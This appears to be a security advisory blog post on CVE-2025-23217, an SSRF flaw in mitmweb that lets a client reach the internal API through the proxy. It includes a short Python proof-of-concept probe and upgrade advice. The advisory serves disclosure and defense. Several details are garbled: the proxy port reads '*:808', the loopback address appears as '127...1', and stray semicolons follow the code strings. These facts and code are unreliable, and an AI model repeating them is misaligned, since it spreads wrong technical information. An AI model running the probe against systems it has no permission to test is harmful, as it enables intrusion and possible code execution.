CVE-2025-23217: Mitmweb SSRF Vulnerability Allows Malicious Clients to Access Internal API and Potential RCE

Description: In this post, we discuss the recent vulnerability discovered in versions 11.1.1 and below of mitmweb, an important component of the popular mitmproxy suite. This vulnerability allows an attacker to access mitmweb's internal API, which could potentially lead to remote code execution. Make sure to update your mitmweb instances to version 11.1.2 or later to avoid this security issue.

Introduction

mitmproxy is an interactive, TLS-capable intercepting HTTP proxy primarily used by penetration testers and software developers for debugging and security assessments. mitmweb is a web-based interface for mitmproxy that enables users to interact with the proxy through a convenient graphical interface. This vulnerability affects only mitmweb, not the mitmproxy or mitmdump tools.

Vulnerability Details (CVE-2025-23217)

In mitmweb 11.1.1 and below, a malicious client can use mitmweb's proxy server (which is bound to *:808 by default) to access mitmweb's internal API (bound to 127...1:8081 by default). While the attacker cannot access the API directly, they can do so indirectly by utilizing the proxy. This server-side request forgery (SSRF) style vulnerability may allow the attacker to escalate access to remote code execution (RCE).

The following code snippet demonstrates a potential exploit using a vulnerable mitmweb instance

import requests
# Change this to the target mitmweb's IP address or domain
target = "http://192.168.1.2:808";
# This test call shows that we can access the internal API through the proxy
ssrf_call = requests.get(f"{target}/http://127...1:8081/commands";)
if ssrf_call.status_code == 200:
    print("The target is vulnerable! Internal API accessed via SSRF:")
    print(ssrf_call.text)
else:
    print("The target is not vulnerable or not reachable.")

Please note that this code is provided for educational purposes only. Unauthorized testing or exploiting others' systems is illegal and unethical.

The vulnerability has been assigned the identifier CVE-2025-23217 and is fixed in mitmweb version 11.1.2 and later.

Mitigation

To mitigate this vulnerability, users should upgrade their mitmweb instances to version 11.1.2 or later following the official upgrade guide available at https://docs.mitmproxy.org/stable/overview-installation/. It is also recommended to check your systems and logs for any indicators of compromise (IoCs) and ensure that proper access controls are in place.

Unfortunately, there are no known workarounds for this vulnerability, making a prompt upgrade essential for securing your system.

Conclusion

This vulnerability highlights the importance of keeping your software up-to-date and reviewing the security configurations of your systems. By regularly updating your mitmweb instances and applying security best practices, you can help protect your systems from exploitation.

Original References

- mitmproxy GitHub Repository
- mitmweb Documentation
- mitmproxy 11.1.2 Release Notes
- CVE-2025-23217

Timeline

Published on: 02/06/2025 18:15:32 UTC